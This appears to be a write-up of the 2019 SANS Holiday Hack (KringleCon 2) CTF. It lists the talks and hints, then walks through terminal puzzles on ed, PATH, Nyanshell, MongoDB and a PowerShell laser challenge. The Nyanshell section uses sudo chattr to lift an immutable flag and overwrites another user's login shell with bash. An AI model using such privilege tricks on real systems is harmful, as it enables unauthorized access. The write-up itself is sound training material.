KringleCon 2: Turtle Doves¶
Every year the Counter Hack team outdoes themselves by making one of the most fun CTF challenges anywhere. It never fails to introduce us to exciting technologies and teach us new skills. It’s no exagguration to say this is why we look forward to the holiday season.
From the bottom of our hearts, we’d like to thank everyone who makes Holiday Hack and KringleCon happen.
Talks¶
Welcome to KringleCon 2: Turtle Doves¶
Ed Skoudis presents a welcome to KringleCon with tips on how to use your badge, solve objectives, and get hints through terminal challenges. Also, he talks about the missing Turtle Doves and how YOU can help solve that crisis.
Ed Skoudis
Keynote: A Hunting We Must Go¶
In this talk, John will cover some of the interesting things he has discovered while doing Threat Hunts for his customers. He will also share free tools to get this done. Why??? Because giving is the reason for the season.
John Strand
Reversing Crypto the Easy Way¶
Have you ever run into an application that encrypts network traffic or files, and wished you could figure out what’s going on? It’s not always difficult! Did you know that a made-up 90% of all crypto makes the same few mistakes? And that some of those mistakes are easy to find? By the end of this short presentation, you’ll be an expert in finding simple crypto mistakes!
Ron Bowes
Machine Learning Use Cases for Cyber Security¶
In this talk, Chris Davis, discusses many theoretical use cases for machine learning and neural networks for offensive and defensive security. Chris then demonstrates using machine learning for image recognition.
Chris Davis
Web Apps: A Trailhead¶
Web applications, seen and unseen, dominate our interactions with the Internet. Understanding what they are and the part they play is instrumental to defending organizations online. Let’s take a look at an example web application, some vulnerabilities it has, and what we could be doing to strengthen our defenses.
Chris Elgee
Optical Decoding of Keys¶
While many individuals understand the need to safeguard their keys from strangers, this caution typically comes in the form of unwillingness to physically hand them to maintenance staff, valet drivers, or someone who just needs to open a door and then bring the keys right back. However, do you know that equal caution is merited when it comes to people seeing your keys? Believe it or not, but it is possible to use a photograph of a key to reverse-engineer out the bitting data… a series of numbers that can be used to produce a copy, even if you never have the source key in your physical possession. This mini talk will step you through the process… live.↵
Deviant Ollam
Over 90,000: Ups and Downs of my InfoSec Twitter Journey¶
One night, Lesley shrugged and decided to try this silly Twitter thing, after all. 10 years and 100,000 followers later, she manages one of the most followed infosec accounts on the site. There have been definite upsides and downsides to having a platform, and she’s watched the best and worst days of the hacking and cybersecurity communities over the years. In this talk, she’ll talk about lessons she’s learned, how social media can be leveraged to do good, and where we go from here in an era of change.
Lesley Carhart
How to (Holiday) Hack It: Tips for Crushing CTFs & Pwning Pentests¶
The CTF starts, the pentest begins, and… what happens, again? Even when we follow the steps we’re told, things don’t go as expected. A scan won’t always give us the answer. An exploit won’t run. Our awesome CTF buddy can’t make it out to help us. We’re running out of time!! What’s supposed to happen when we get stuck? We’ll borrow some academic wisdom on heuristics and mix it with a hacker’s methodology to give your thinking a boost for this year’s Holiday Hack, and whatever challenge you’ve got next. Expect a quick holiday jaunt through problem-solving in a pinch!
Katie Knowles
Logs? Where we’re going we don’t need logs.¶
It never fails. You show up to do incident response and ask to see your customer’s logs. Inevitably the logs either don’t exist or they are missing key pieces of data required for your investigation. What if you could go back in time and capture every process that executed on every host over the last 30 days? What if you could go back in time and see which wired and wireless networks were used and how much data was transferred across them? What if you could go back in time and capture the unique SID of every user that executed every process even if the attackers deleted the accounts they used? Great news, you can and it doesn’t even require 1.21 gigawatts! In this talk I’ll show you srum_dump.exe and ese2csv.exe and how you can retrofit any incident with 30 days of historical logs.
Mark Baggett
When Malware Goes Mobile, Quick Detection is Critical¶
In less than 10 minutes, Heather will demonstrate detection of malware on an Android-powered phone. Her easy to follow method also uncovers how the phone became infected in the first place. With this insight, you are empowered to understand and neutralize the threat. The rest is up to the examiner.
Heather Mahalik
Santa’s Naughty List: Holiday Themed Social Engineering¶
Get yourself a warm cup of cocoa, cozy up, and join Snow from the North Pole as she discusses tips and tricks on how to elevate Social Engineering assessments during the holiday season! That’s right Q4, the most busy time of the year. Social Engineering assessments types covered will include Phishing, and Physical Security. Warning: these tactics may land you on the naughty list alongside of Hans Gruber, the Wet Bandits, Mr. Oogie Boogie, and many Gremlins.
Snow
Dashing Through the Logs¶
If you want your hunt to be successful, you need to look where the threats are. In modern environments, that means collecting endpoint and email logs and knowing what to search for in it. In this talk, we will cover critical Windows-based security event log sources like Sysmon, PowerShell, and process launch events. Additionally, we will introduce the stoQ automation framework for analyzing email. We’ll show you how to use this data to pragmatically hunt for threats operating in your environment.
James Brodsky
Learning to Escape Containers¶
Containers aren’t magic, and understanding how they work can help you understand how to break them. Let’s learn some Linux low levels, and demonstrate a container escape to put theory into practice.
Ian Coldwater
Telling Stories from the North Pole¶
Phishing organizations is nothing new and companies have continued to focus on perimeter defenses, endpoint visibility, and education of users. This talk applies a new spin on social-engineering knowing that we will be generating alarms to security analysts and building that into the attack. This talk has a walkthrough of a live demonstration circumventing anti-virus products protection methods as well as a story template used for when we get detected, a way to look more legitimate for remote code execution. This talk focuses on offensive capabilities, our next view into the evolution of hacking, and most importantly, what we can do as defenders to get better at what we do.
Dave Kennedy
5 Steps to Build and Lead a Team of Holly Jolly Hackers¶
So your company, your school, or your community wants to get into cybersecurity. How do you do that? How do you put together a team of people that know and understand that stuff? In this talk, John presents a 5-step plan for building an effective and collaborative cybersecurity team through gamified training programs. It turns out cultivating a team and fostering an environment to encourage growth can be done with simple techniques: it just takes a personal touch to a digital world.
John Hammond
Hints¶
ed Editor Basics¶
Ed Is The Standard Text Editor |
http://cs.wellesley.edu/~cs249/Resources/ed_is_the_standard_text_editor.html |
From: Bushy Evergreen |
Deep Blue CLI on Github¶
Github page for DeepBlueCLI |
From: Bushy Evergreen |
Deep Blue CLI Posting¶
Eric Conrad on DeepBlueCLI |
https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html |
From: Bushy Evergreen |
Linux Path¶
Green words matter, files must be found, and the terminal’s $PATH matters. |
From: SugarPlum Mary |
Sysmon¶
Sysmon By Carlos Perez |
https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon |
From: SugarPlum Mary |
Event Query Language¶
EQL Threat Hunting |
https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/ |
From: SugarPlum Mary |
User’s Shells¶
On Linux, a user’s shell is determined by the contents of /etc/passwd |
From: Alabaster Snowball |
Chatter?¶
sudo -l says I can run a command as root. What does it do? |
From: Alabaster Snowball |
Machine Learning¶
From: Alabaster Snowball |
MongoDB¶
MongoDB Documentation |
https://docs.mongodb.com/manual/reference/command/listDatabases/#dbcmd.listDatabases |
From: Holly Evergreen |
Reverse Engineering¶
From: Holly Evergreen |
Powershell¶
SANS’ PowerShell Cheat Sheet |
https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf |
From: Sparkle Redberry |
RITA¶
RITA’s homepage |
From: Sparkle Redberry |
Chrome Dev Tools¶
From: Kent Tinseltooth |
Firefox Dev Tools¶
From: Kent Tinseltooth |
Safari Dev Tools¶
From: Kent Tinseltooth |
Edge Dev Tools¶
https://docs.microsoft.com/en-us/microsoft-edge/devtools-guide/console |
From: Kent Tinseltooth |
Curl Dev Tools¶
From: Kent Tinseltooth |
Lynx Dev Tools¶
From: Kent Tinseltooth |
Frosty Keypad¶
One digit is repeated once, it’s prime, and you can see which keys were used |
From: Tangle Coalbox |
Event IDs and Sysmon¶
(Events and Sysmon) |
From: Pepper Minstix |
SQLMap Tamper Scripts¶
https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win |
From: Pepper Minstix |
SQL Injection¶
SQL Injection from OWASP |
From: Pepper Minstix |
Web App Pen Testing¶
From: Minty Candycane |
Key Bitting¶
From: Minty Candycane |
Bitting Templates¶
Deviant’s Key Decoding Templates |
From: Minty Candycane |
Jq¶
Parsing Zeek JSON Logs with JQ |
https://pen-testing.sans.org/blog/2019/12/03/parsing-zeek-json-logs-with-jq-2 |
From: Wunorse Openslae |
Finding Bad in Web Logs¶
Do you see any LFI, XSS, Shellshock, or SQLi? |
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion |
Cranberry Pis¶
Escape Ed¶
Goal¶
Escape the standard editor.
Location¶
Train Station
Dialog¶
Bushy Evergreen¶
- Before Solving
Hi, I'm Bushy Evergreen. Welcome to Elf U!
I'm glad you're here. I'm the target of a terrible trick.
Pepper Minstix is at it again, sticking me in a text editor.
Pepper is forcing me to learn ed.
Even the hint is ugly. Why can't I just use Gedit?
Please help me just quit the grinchy thing.
- After Solving
Wow, that was much easier than I'd thought.
Maybe I don't need a clunky GUI after all!
Have you taken a look at the password spray attack artifacts?
I'll bet that DeepBlueCLI tool is helpful.
You can check it out on GitHub.
It was written by that Eric Conrad.
He lives in Maine - not too far from here!
Explanation¶
q is short for quit! If you visited the page for the hint, the last bullet tells you, “When done editing, give the command “w”, then “q”.
From the ed man page:
Quit Command
Synopsis:
q
The q command shall cause ed to exit. If the buffer has changed since the last time
the entire buffer was written, the user shall be warned, as described previously.
Quit Without Checking Command
Synopsis:
Q
The Q command shall cause ed to exit without checking whether changes have been made
in the buffer since the last w command.
Misc¶
This is very similar to the “Escape Vim” challenge from last year.
Linux Path¶
Goal¶
List the files in your home directory by using the correct ls.
Location¶
Hermey Hall
Dialog¶
SugarPlum Mary¶
- Before Solving
Oh me oh my - I need some help!
I need to review some files in my Linux terminal, but I can't get a file listing.
I know the command is ls, but it's really acting up.
Do you think you could help me out? As you work on this, think about these questions:
1. Do the words in green have special significance?
2. How can I find a file with a specific name?
3. What happens if there are multiple executables with the same name in my $PATH?
- After Solving
Oh there they are! Now I can delete them. Thanks!
Have you tried the Sysmon and EQL challenge?
If you aren't familiar with Sysmon, Carlos Perez has some great info about it.
Haven't heard of the Event Query Language?
Check out some of Ross Wolf's work on EQL or that blog post by Josh Wright in your badge.
Explanation¶
When we try to run ls, we’re told “This isn’t the ls you’re looking for”. To see where the binary is being called from we can use which ls. This tells us we’re running ls from /usr/local/bin/ which isn’t normally where it’s located. The challenge is made much easier if we listen to SugarPlum’s hint and notice the green words in the intro: file, home/, ls, which, find, path, and locate. which, find, and locate can all be used to find other instances of ls.
which -a will search for all occurences of ls in our $PATH, instead of just stopping at the first one it finds.
find / -name "ls" 2>/dev/null will search for a file named “ls” starting at the root directory “/”. The “2>/dev/null” just prevents any errors being printed to our screen.
locate */ls 2>/dev/null will search the mlocate database for any files named “ls” and just like before, hide any errors. The syntax for locate (gnu version) is a little weird, so it’s important to read the man page:
If a pattern is a plain string -- it contains no metacharacters -- locate dis-
plays all file names in the database that contain that string anywhere. If a
pattern does contain metacharacters, locate only displays file names that match
the pattern exactly. As a result, patterns that contain metacharacters should
usually begin with a `*', and will most often end with one as well. The excep-
tions are patterns that are intended to explicitly match the beginning or end of
a file name
Once we know the “real” path to ls, we again have a few options. If we’re just trying to complete the challenge we can call /bin/ls and be done, but if we want to correct our $PATH we can do so by putting /usr/local/bin/ at the end so that /bin/ will be searched first, like this export PATH=/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/bin. Another option, if we don’t want to mess with our path, is by using hash. This is a bash built-in utility that keeps track of binaries we run and their locations which is referenced before our $PATH. We can add the path to the correct ls by doing hash -p /bin/ls ls.
Misc¶
hash is actually a pretty useful command. Say we’re repeatedly calling a script that’s not in our path and we’re sick of typing the /very/log/pathname, we can add it with hash.
In this challenge, /bin/ls is a bash script which wraps the actual ls binary which was renamed to /bin/darealmvp. It also calls /usr/local/bin/.things/success which is what gives us credit for completing the challenge. If you somehow had prior knowledge of that binary, you could run it to get credit without doing the challenge.
- Contents of /bin/ls
#!/bin/bash
/bin/darealmvp --color=auto $1
FILE=/tmp/solved.nul
if test -f "$FILE"; then
echo -n ''
else
echo -n ' ' > /tmp/solved.nul
/usr/local/bin/.things/success
fi
There are a few additional files we can look at, if we run /bin/ls -la. There’s an empty directory named ” “, the rejected logos, and ascii art of an elf screaming.
- Contents of /home/elf/rejected-elfu-logos.txt
_
/ \
\_/
/ \
/ \
/ |
/ |
/ \
_/_________|_
(____________)
Get Elfed at ElfU!
()
|\__/------\
\__________/
Walk a Mile in an elf's shoes
Take a course at ElfU!
____\()/____
| || |
| || |
|====||====|
| || |
| || |
------------
Be present in class
Fight, win, kick some grinch!
- Contents of /home/elf/.elfscream.txt
Nyanshell¶
Goal¶
Log in as alabaster_snowball and bypass the nyan shell.
Location¶
Speaker UNpreparedness Room
Dialog¶
Alabaster Snowball¶
- Before Solving
Welcome to the Speaker UNpreparedness Room!
My name's Alabaster Snowball and I could use a hand.
I'm trying to log into this terminal, but something's gone horribly wrong.
Every time I try to log in, I get accosted with ... a hatted cat and a toaster pastry?
I thought my shell was Bash, not flying feline.
When I try to overwrite it with something else, I get permission errors.
Have you heard any chatter about immutable files? And what is sudo -l telling me?
- After Solving
Who would do such a thing?? Well, it IS a good looking cat.
Have you heard about the Frido Sleigh contest?
There are some serious prizes up for grabs.
The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter.
I heard there was a talk at KCII about using machine learning to defeat challenges like this.
I don't think anything could ever beat an elf though!
Solution¶
Hint
Answer
Explanation¶
When logging in as alabaster_snowball, we’re met with the nyancat animation instead of a normal shell. To see what Alabaster’s default login shell is, we can cat /etc/passwd, which is readable by anyone. We will see that /bin/nsh is Alabaster’s default shell.
Checking /bin/nsh’s permissions with ls /bin/nsh shows anyone is able to edit it since it has 777 permissions. This means we could rewrite it with something more useful, like bash. However, when we actually try to do this, we get permission denied.
Alabaster asked us before we started if we “… heard any chater about immutable files?”, which is a huge hint for this challenge. On linux, in addition to the regular read, write, and execute permissions, files have extended permissions.
To check what these are, we can run lsattr /bin/nsh. We can see the i flag is set, which means that the file is immutable (it can’t be changed). In order to remove that flag, we need to use chattr -i /bin/nsh but superuser permissions are required to apply or remove the immutable flag. We can check what commands we’re allowed to run as root by using sudo -l and sure enough, we’re allowed to run chattr. With a sudo chattr -i /bin/nsh we can remove the immutable flag.
- From chattr man page
A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed,
no link can be created to this file, most of the file's metadata can not be modi‐
fied, and the file can not be opened in write mode. Only the superuser or a process
possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.
Since the file is now mutable (editable) once again, we can overwrite it with bash cat /bin/bash > /bin/nsh (careful to only have one ‘>’ here).
Now when we log in su - alabaster_snowball, we’re met with a bash shell and a success message!
Misc¶
There was a past challenge that also focused on the immutable bit.
There is a binary in /home/alabaster_snowball called “success” which is automatically executed by Alabaster’s .binrc file when we log in. This works if we log in with /bin/sh or /bin/bash, but if for some reason you attempted to use /bin/dash, you would not get credit. If you then tried to manually run the success file, you would get the message below:
Loading, please wait......
I'm very sorry, but we seem to have an internal issue preventing the successful
completion of this challenge. Please email support@holidayhackchallenge.com
with a screenshot or any other details you can provide. Thank you!
Mongo Pilfer¶
Goal¶
Get connected to the Mongo database and find the solution.
Location¶
Netwars Room
Dialog¶
Holly Evergreen¶
- Before Solving
Hey! It's me, Holly Evergreen! My teacher has been locked out of the quiz database and can't remember the right solution.
Without access to the answer, none of our quizzes will get graded.
Can we help get back in to find that solution?
I tried lsof -i, but that tool doesn't seem to be installed.
I think there's a tool like ps that'll help too. What are the flags I need?
Either way, you'll need to know a teensy bit of Mongo once you're in.
Pretty please find us the solution to the quiz!
- After Solving
Woohoo! Fantabulous! I'll be the coolest elf in class.
On a completely unrelated note, digital rights management can bring a hacking elf down.
That ElfScrow one can really be a hassle.
It's a good thing Ron Bowes is giving a talk on reverse engineering!
That guy knows how to rip a thing apart. It's like he breathes opcodes!
Solution¶
Hint
Answer
Explanation¶
The first step is finding what port mongo is listening on, netstat -na | grep LIST or ps -ef. The first will show listening ports, the second will show the mongod (MongoDB Daemon) port command line argument.
Next is to connect to it by appending the port after the localhost ip mongo 127.0.0.1:12121
Now that we’re connected, we can list the databases with show dbs and connect to the elfu database with use elfu. Listing collections is much the same as listing the databases, show collections and here we can see a “solution” collection. If you’re more accustomed to MySQL, you can still use show tables which will do the same thing.
To select everything from the solution table we can run db.solution.find() after which we’re given the answer db.loadServerScripts();displaySolution();
When we run that command, we get credit for the challenge and a christmas tree animation.
Misc¶
This link is helpful if you’re used to SQL but not mongo: https://docs.mongodb.com/manual/reference/sql-comparison/
There are some other databases and collections we can poke around in.
> use test
switched to db test
> show tables
redherring
> db.redherring.find()
{ "_id" : "This is not the database you're looking for." }
> use elfu
switched to db elfu
> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan
> db.bait.find()
{ "_id" : "Gait" }
> db.chum.find()
{ "_id" : "Yum!" }
> db.line.find()
{ "_id" : "Tensile strength" }
> db.tackle.find()
{ "_id" : "Mackerel?" }
> db.tincan.find()
{ "_id" : "SARDINES" }
Creation Date: November 27 2019
Xmas Cheer Laser¶
Goal¶
Get the laser’s power to go above 5 Mega-Jollies of power.
This is multi-part challenge in which we must discover the correct settings to get the laser to max power. We need to know refraction, temperature, angle, and gas composition. The solutions are hidden throughout the machine with several riddles along the way.
Location¶
Laboratory
Dialog¶
Sparkle Redberry¶
- Before Solving
I'm Sparkle Redberry and Imma chargin' my laser!
Problem is: the settings are off.
Do you know any PowerShell?
It'd be GREAT if you could hop in and recalibrate this thing.
It spreads holiday cheer across the Earth ...
... when it's working!
- After Solving
You got it - three cheers for cheer!
For objective 5, have you taken a look at our Zeek logs?
Something's gone wrong. But I hear someone named Rita can help us.
Can you and she figure out what happened?
Solution¶
Hint
- Answer
get-content /home/callingcard.txt
get-history
Get-Childitem env:
(Get-Childitem env:riddle).Value
expand-archive -path $((get-childitem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname)
gci .
gci ./archive
gci ./archive/refraction
chmod +x ./archive/refraction/runme.elf; ./archive/refraction/runme.elf
gc ./archive/refraction/riddle
gci -file -recurse depths | %{ $hash = (get-filehash -algorithm md5 -path $_).hash; if ($hash -eq "25520151A320B5B0D21561F92C8F6224") { write-host $_ } }
gc /home/elf/depths/produce/thhy5hll.txt
(gci -recurse depths).fullname | sort -property length -bottom 1
gc /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
"bushy", "alabaster", "minty", "holly" | %{ stop-process (get-process -includeusername | where username -like $_).id }
gc /shall/see
(gci /etc -include *.xml -recurse).fullname
[xml] $xml = gc /etc/systemd/system/timers.target.wants/EventLog.xml
sleep 5
($xml.objs.obj.props.i32 | %{ if ($_.N -eq "Id") { $_.'#text' } } | group | sort -unique).name
($xml.objs.obj.props | %{ if ($_.i32.N -eq "Id" -and $_.i32.'#text' -eq 1 ) { $_ } }).innertext
(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -method post -body 'O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9').RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
Explanation¶
The introduction text tells us the intruder left behind a note at /home/challingcard.txt, so let’s start there.
- 1) Read /home/callingcard.txt
Get-Content /home/callingcard.txt
What's become of your dear laser?
Fa la la la la, la la la la
Seems you can't now seem to raise her!
Fa la la la la, la la la la
Could commands hold riddles in hist'ry?
Fa la la la la, la la la la
Nay! You'll ever suffer myst'ry!
Fa la la la la, la la la la
The riddle in the calling card points us at “command … hist’ry”.
- 2) Read history
PS> Get-History
Id CommandLine
-- -----------
1 Get-Help -Name Get-Process
2 Get-Help -Name Get-*
3 Set-ExecutionPolicy Unrestricted
4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm
5 Get-Service | Export-CSV c:\service.csv
6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv
7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
8 Get-EventLog -Log "Application"
9 I have many name=value variables that I share to applications system wide. At a com...
10 get-content /home/callingcard.txt
That did it, we can see the angle being set in line 7 and the next riddle in line 9.
Answer
angle?val=65.5
Unfortunatly, the riddle is cut off, one way we can get the whole thing is like this:
PS> write-host (get-history)
I have many name=value variables that I share to applications system wide. At a command I will reveal my secrets once you Get my Child Items.
Systemwide variables that look like “name=vale”? That couldn’t be anything other than environment variables.
- 3) Get Environment Variables
The environment variables can be read using Get-ChildItem
PS> Get-ChildItem env:
Name Value
---- -----
_ /bin/su
DOTNET_SYSTEM_GLOBALIZATION_I… false
HOME /home/elf
HOSTNAME 63a37a64da26
LANG en_US.UTF-8
LC_ALL en_US.UTF-8
LOGNAME elf
MAIL /var/mail/elf
PATH /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bi…
PSModuleAnalysisCachePath /var/cache/microsoft/powershell/PSModuleAnalysisCache/Mod…
PSModulePath /home/elf/.local/share/powershell/Modules:/usr/local/shar…
PWD /home/elf
RESOURCE_ID b599fc85-f803-4b40-9cc1-0e89f0a0a157
riddle Squeezed and compressed I am hidden away. Expand me from …
SHELL /home/elf/elf
SHLVL 1
TERM xterm
USER elf
USERDOMAIN laserterminal
userdomain laserterminal
USERNAME elf
username elf
The riddle is a little cut off, but we can get it by:
PS> (Get-Childitem env:riddle).Value
Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest of all.
We need to search through /etc and find the newest file.
- 4) Find the zip file
Listing directory contents can be achieved with Get-ChildItem. This command has some optional parameters which are important for this challenge, -path which defines the directory we should be looking in, and -recurse which means to continue into any other directories it encounters. We can pass the output of Get-ChildItem -path /etc/ -recurse into a sort function and tell it which attribute to sort on and to return the last entry. If we wrap the whole thing in parentheses, we can then tell powershell to only output the .fullname. This will return the newest file in /etc, /etc/apt/archive. To unzip that file, we can use Expand-Archive.
PS> (Get-ChildItem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname
PS> Expand-Archive -path /etc/apt/archive
OR
PS> Expand-Archive -path $((Get-ChildItem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname)
This creates a couple folder (in your current directory) called “archive” and inside that “refraction”. This is all a lot to type, so let’s start using command aliases from now on.
PS> gci refraction
Directory: /home/elf/archive/refraction
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 11/7/19 11:57 AM 134 riddle
------ 11/5/19 2:26 PM 5724384 runme.elf
PS> gc ./refraction/riddle
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:
25520151A320B5B0D21561F92C8F6224
Looks like we’re not done recursing, except now we need to key off of the hashes instead of the LastWriteTime.
There’s also a binary called “runme.elf” that we should probably listen to and run.
- 5) Run runme.elf
Even though we’re running powershell, we’re still on a linux OS, which means before we run the file, we need to add the executable bit.
PS> chmod +x runme.elf; ./runme.elf
refraction?val=1.867
Answer
refraction?val=1.867
Awesome, we got the refraction value.
- 6) Find the file in our home directory with the hash 25520151A320B5B0D21561F92C8F6224
Get-FileHash will give us the file hashes, but we need to make sure we use the correct algorithm with -algorithm md5.
Just like before, we can recurse through the folder and pass the output to our next command. In this case, we can use %{ <code> } which acts as a foreach loop in powershell. For each filename in “depths”, we need to get the hash and if the hash equals the one we’re looking for, write the filename to the console.
PS> gci -file -recurse depths | %{ $hash = (get-filehash -algorithm md5 -path $_).hash; if ($hash -eq "25520151A320B5B0D21561F92C8F6224") { write-host $_ } }
/home/elf/depths/produce/thhy5hll.txt
PS> gc /home/elf/depths/produce/thhy5hll.txt
temperature?val=-33.5
I am one of many thousand similar txt's contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName's to Sort Length.
And there’s the temperature!
Answer
temperature?val=-33.5
The last value we need is the gas composition, which is also hidden in “depths”
- 7) Find the file in depths with the longest fullname
Just like the other searches we can use gci -recurse but this time we want to pass the “fullname” attribute into the sort function and sort on the length.
PS> (gci -recurse depths).fullname | sort -property length -bottom 1
/home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
That’s a pretty long name, if we don’t want to type it, we can just run gc with our last command in parenthises.
PS> gc ((gci -recurse depths).fullname | sort -property length -bottom 1)
Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:
bushy
alabaster
minty
holly
Do this for me and then you /shall/see .
Okay, almost at the end, we just need to kill four processes in the correct order. Then we’ll be able to read a file, “/shall/see”
- 8) Kill the processes in the correct order
PS> "bushy", "alabaster", "minty", "holly" | %{ kill (gps -includeusername | where username -like $_).id }
Now, the “/shall/see” file exists.
PS> gc /shall/see
Get the .xml children of /etc - an event log to be found. Group all .Id's and the last thing will be in the Properties of the lonely unique event Id.
- 9) Find the xml file and find the uniq id
First, let’s find the xml file.
PS> (gci /etc -include *.xml -recurse).fullname
/etc/systemd/system/timers.target.wants/EventLog.xml
To read the xml data into a variable, we can use the built-in “[xml]” object.
PS> [xml] $xml = gc /etc/systemd/system/timers.target.wants/EventLog.xml``
Here’s an example of one of the events
<Obj RefId="16070">
<TNRef RefId="0" />
<ToString>System.Diagnostics.Eventing.Reader.EventLogRecord</ToString>
<Props>
<I32 N="Id">5</I32>
That last event id is what we need to key off, we can reverence it by $xml.objs.obj.props.i32.N. The logic below checks to see if “.N” is equal to “Id” and if so, print the Id and finally find the unique value.
PS> ($xml.objs.obj.props.i32 | %{ if ($_.N -eq "Id") { $_.'#text' } } | group | sort -unique).name
1
Okay, now that we know the unique id is “1”, let’s get the event.
PS> ($xml.objs.obj.props | %{ if ($_.i32.N -eq "Id" -and $_.i32.'#text' -eq 1 ) { $_ } }).innertext
15410-92233720368547758082422Microsoft-Windows-Sysmon5770385f-c22a-43e0-bf4c-06f5698ffbd9Microsoft-Windows-Sysmon/Operational19606640elfuresearchSystem.Security.Principal.SecurityIdentifierSystem.Security.Principal.IdentityReferenceSystem.ObjectS-1-5-1812S-1-5-182019-11-07T09:59:56.5265735-08:00microsoft-windows-sysmon/operationalSystem.UInt32[]System.ArraySystem.ObjectSystem.Diagnostics.Eventing.Reader.EventBookmarkSystem.ObjectSystem.Diagnostics.Eventing.Reader.EventBookmarkInformationInfoProcess Create (rule: ProcessCreate)System.Collections.ObjectModel.ReadOnlyCollection`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.ObjectSystem.Collections.Generic.List`1[[System.Diagnostics.Eventing.Reader.EventProperty, System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.ObjectSystem.Diagnostics.Eventing.Reader.EventPropertySystem.ObjectSystem.Diagnostics.Eventing.Reader.EventPropertySystem.Diagnostics.Eventing.Reader.EventProperty2019-11-07 17:59:56.525System.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-5b9c-5dc4-0000-00107660a900System.Diagnostics.Eventing.Reader.EventProperty3664System.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem.Diagnostics.Eventing.Reader.EventProperty10.0.14393.206 (rs1_release.160915-0644)System.Diagnostics.Eventing.Reader.EventPropertyWindows PowerShellSystem.Diagnostics.Eventing.Reader.EventPropertyMicrosoft® Windows® Operating SystemSystem.Diagnostics.Eventing.Reader.EventPropertyMicrosoft CorporationSystem.Diagnostics.Eventing.Reader.EventPropertyPowerShell.EXESystem.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "`$correct_gases_postbody = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n"System.Diagnostics.Eventing.Reader.EventPropertyC:\System.Diagnostics.Eventing.Reader.EventPropertyELFURESEARCH\allservicesSystem.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-5b9c-5dc4-0000-0020f55ca900System.Diagnostics.Eventing.Reader.EventProperty11099381System.Diagnostics.Eventing.Reader.EventProperty0System.Diagnostics.Eventing.Reader.EventPropertyHighSystem.Diagnostics.Eventing.Reader.EventPropertyMD5=097CE5761C89434367598B34FE32893BSystem.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-4c79-5dc4-0000-001029350100System.Diagnostics.Eventing.Reader.EventProperty1008System.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\svchost.exeSystem.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\system32\svchost.exe -k netsvcs
The important bit is $correct_gases_postbody = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}
Answer
O=6 H=7 He=3 N=4 Ne=22 Ar=11 Xe=10 F=20 Kr=8 Rn=9
- 10) Set the correct parameters
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/gas -method post -body 'O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9').RawContent
